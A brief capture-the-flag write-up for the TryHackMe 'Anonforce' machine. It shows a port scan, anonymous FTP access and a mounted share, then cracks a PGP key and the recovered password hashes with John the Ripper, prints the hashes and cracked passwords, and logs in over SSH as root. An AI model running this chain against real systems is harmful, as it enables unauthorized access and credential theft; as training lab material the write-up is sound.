CTF Anonforce

CTFTryHackMe
,

rustscan

1
rustscan -a 10.10.133.18

Output:

1
2
3
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack

ftp and ssh.

ftp

1
2
ftp 10.10.133.18 
anonymous

mount

1
2
3
cd Documents/CTF/THM/anonforce 
mkdir ftp
curlftpfs 10.10.133.18 Documents/CTF/THM/anonforce/ftp

The first flag is in the home directory of melodias.

enum


notread is interesting.

crack pgp

1
2
gpg2john ftp/notread/private.asc > hash 
john hash --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

password: xbox360

Import the key:

1
gpg --import ftp/notread/private.asc

Decrypt:

1
gpg --decrypt ftp/notread/backup.pgp


We can see the hash for melodias and root

1
2
3
$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0

$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1

Crack it with john.

1
john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash2

Password: hikari

ssh

1
ssh [email protected]